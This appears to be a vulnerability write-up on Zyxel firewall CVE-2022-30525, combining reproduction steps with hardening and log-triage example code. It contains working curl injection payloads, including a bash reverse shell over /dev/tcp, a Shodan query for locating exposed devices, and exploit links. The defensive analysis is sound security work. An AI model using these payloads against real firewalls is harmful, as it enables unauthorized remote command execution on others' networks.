Vulnerability Overview
The Zyxel firewall vulnerability tracked as CVE-2022-30525 arises from improper handling of specially crafted input in the CGI program of specific Zyxel firewall firmware versions. The flaw lets an unauthenticated attacker inject system commands, modify specific files, and ultimately execute arbitrary code.
Affected Versions
Zyxel firmware 5.00 through 5.21 (5.00 ≤ version ≤ 5.21)
Shodan Search Syntax
title:"USG FLEX 100","USG FLEX 100w","USG FLEX 200","USG FLEX 500","USG FLEX 700","USG FLEX 50","USG FLEX 50w","ATP100","ATP200","ATP500","ATP700"

Vulnerability Exploit
https://github.com/Henry4E36/CVE-2022-30525
https://github.com/superzerosec/CVE-2022-30525
Vulnerability Reproduction
Zyxel firewalls with this vulnerability are susceptible to unauthenticated remote command injection via the management HTTP interface. Injected commands run as the nobody user. The vulnerability is reached through the /ztp/cgi-bin/handler URI, which passes unfiltered attacker input to os.system in lib_wan_settings.py. The vulnerable function setWanPortSt is associated with the command being called; arbitrary commands can be injected through the mtu or data parameters.
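To make the root cause concrete, the following added example (written for this page, not code from Zyxel or from lib_wan_settings.py) reconstructs the pattern described above: a request parameter spliced into a shell command string, beside a hardened version that validates mtu as an integer in a sane range and builds an argv list for subprocess.run without a shell. The ifconfig command, the wan<port> interface name and the MTU bounds are assumptions for illustration.

```python
import re
import subprocess
from typing import List

# Constructed illustration (not Zyxel's code): the vulnerable pattern.
# The attacker-controlled `mtu` value is interpolated into a shell string,
# so a value such as "; ping 192.168.1.220;" ends the intended command and
# appends another. The string is returned rather than passed to os.system
# so it can be inspected safely.
def build_wan_command_vulnerable(port: str, mtu: str) -> str:
    return f"ifconfig wan{port} mtu {mtu}"  # assumed command shape

# Hardened version: strict allow-list validation, then an argv list that
# is never interpreted by a shell.
MTU_MIN, MTU_MAX = 576, 9000        # assumed plausible bounds
PORT_RE = re.compile(r"[0-9]{1,2}")
MTU_RE = re.compile(r"[0-9]{3,5}")

def validate_mtu(mtu: str) -> int:
    """Accept only a plain decimal integer inside the allowed MTU range."""
    if not MTU_RE.fullmatch(mtu):
        raise ValueError(f"invalid mtu: {mtu!r}")
    value = int(mtu)
    if not MTU_MIN <= value <= MTU_MAX:
        raise ValueError(f"mtu out of range: {value}")
    return value

def build_wan_command_hardened(port: str, mtu: str) -> List[str]:
    """Return an argv list suitable for subprocess.run(argv) with shell=False."""
    if not PORT_RE.fullmatch(port):
        raise ValueError(f"invalid port: {port!r}")
    return ["ifconfig", f"wan{port}", "mtu", str(validate_mtu(mtu))]

def accepts(port: str, mtu: str) -> bool:
    """True if the hardened validator would accept these request parameters."""
    try:
        build_wan_command_hardened(port, mtu)
        return True
    except ValueError:
        return False

def run_hardened(port: str, mtu: str, dry_run: bool = True) -> List[str]:
    """Build and (optionally) execute the command with no shell involved."""
    argv = build_wan_command_hardened(port, mtu)
    if not dry_run:
        # shell=False: metacharacters in any argument are passed literally,
        # never interpreted, so injection via mtu is not possible here.
        subprocess.run(argv, check=True)
    return argv

if __name__ == "__main__":
    payload = "; ping 192.168.1.220;"      # the write-up's sample injection
    print("vulnerable builds:", build_wan_command_vulnerable("4", payload))
    print("hardened accepts payload:", accepts("4", payload))
    print("hardened accepts 1500:", accepts("4", "1500"))
```

The point of the comparison is that the hardened path never lets the request value reach a shell at all: even if validation were loosened, subprocess with an argument list passes "; ping ..." as a literal argument to ifconfig rather than as a second command.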
Here, the firewall is made to execute the ping command using curl.

```bash
curl -v --insecure -X POST -H "Content-Type: application/json" -d '{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"; ping 192.168.1.220;","data":"hi"}' https://192.168.1.1/ztp/cgi-bin/handler
```
Using bash for a reverse shell. The officially provided bash -c "exec bash -i" did not succeed in testing, so the most basic form of the command is used below.

```bash
curl -v --insecure -X POST -H "Content-Type: application/json" -d '{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"; bash -i >& /dev/tcp/192.168.1.2/1234 0>&1;","data":"hi"}' https://192.168.1.1/ztp/cgi-bin/handler
```
dnslog can be used to detect vulnerable IPs in batch.
Traceability Investigation
Currently, there are no logs available for investigation: the payload sits in the POST body, which most middleware does not log. Where logs are available, focus on requests to the path /ztp/cgi-bin/handler.
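The following added example (constructed for this page, not a Zyxel log format or tool) shows the triage logic the paragraph implies, run over a small set of constructed request records of the kind a reverse proxy or WAF that captures bodies might emit. It flags POSTs to /ztp/cgi-bin/handler whose JSON body calls setWanPortSt with shell metacharacters in the mtu or data parameters, and falls back to path-only findings when the body is missing or unparseable, which is all that access logs alone can give. The record fields (src, method, path, body) and the metacharacter set are assumptions.

```python
import json
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample records (hypothetical proxy/WAF export, not real logs).
# The first body reuses the write-up's own ping payload.
SAMPLE_REQUESTS: List[Dict[str, str]] = [
    {"src": "203.0.113.10", "method": "POST", "path": "/ztp/cgi-bin/handler",
     "body": '{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1",'
             '"vlanid":"5","mtu":"; ping 192.168.1.220;","data":"hi"}'},
    {"src": "198.51.100.7", "method": "POST", "path": "/ztp/cgi-bin/handler",
     "body": '{"command":"setWanPortSt","proto":"dhcp","port":"1","vlan_tagged":"0",'
             '"vlanid":"1","mtu":"1500","data":"hi"}'},
    {"src": "198.51.100.8", "method": "GET", "path": "/login", "body": ""},
    {"src": "203.0.113.11", "method": "POST", "path": "/ztp/cgi-bin/handler",
     "body": "not json"},
]

HANDLER_PATH = "/ztp/cgi-bin/handler"
VULN_COMMAND = "setWanPortSt"
INJECTION_PARAMS = ("mtu", "data")          # parameters named in the write-up
# Characters that let a value break out of a shell command string (assumed set).
SHELL_META = re.compile(r"[;&|`$(){}<>\n]")

def classify_request(req: Dict[str, str]) -> Optional[str]:
    """Return a finding label for a suspicious request, or None if it looks benign."""
    if req.get("path") != HANDLER_PATH or req.get("method") != "POST":
        return None
    body = req.get("body", "")
    if not body:
        # Access logs without bodies: the path alone is the only signal, so
        # surface the request for manual review rather than calling it clean.
        return "handler-post-review"
    try:
        params = json.loads(body)
    except ValueError:
        return "handler-post-unparseable-body"
    if not isinstance(params, dict) or params.get("command") != VULN_COMMAND:
        return None
    for name in INJECTION_PARAMS:
        if SHELL_META.search(str(params.get(name, ""))):
            return f"command-injection:{name}"
    if not re.fullmatch(r"[0-9]+", str(params.get("mtu", ""))):
        return "suspicious-mtu"            # non-numeric MTU without metacharacters
    return None

def scan(requests: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (source IP, finding) pairs for every request that raises a finding."""
    findings = []
    for req in requests:
        label = classify_request(req)
        if label is not None:
            findings.append((req["src"], label))
    return findings

if __name__ == "__main__":
    for src, label in scan(SAMPLE_REQUESTS):
        print(f"{src}\t{label}")
```

The legitimate-looking second record (numeric mtu, plain data) produces no finding, which is the behaviour to want when the same handler is used for normal zero-touch provisioning; in practice the status code the conclusion mentions (500 on a vulnerable target) can be added as a further weak signal when the proxy records it.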
Conclusion
Do not rely on the exploit provided in the official msf module; none of the variants succeeded in testing. A 500 status code indicates that the vulnerability exists, but this determination logic is not rigorous!
Since the injected command runs as the nobody user and the firewall's system architecture is mips64, even a successful reverse shell yields only low privileges. With no privilege escalation vulnerability currently available, the actual harm caused by this vulnerability is not high.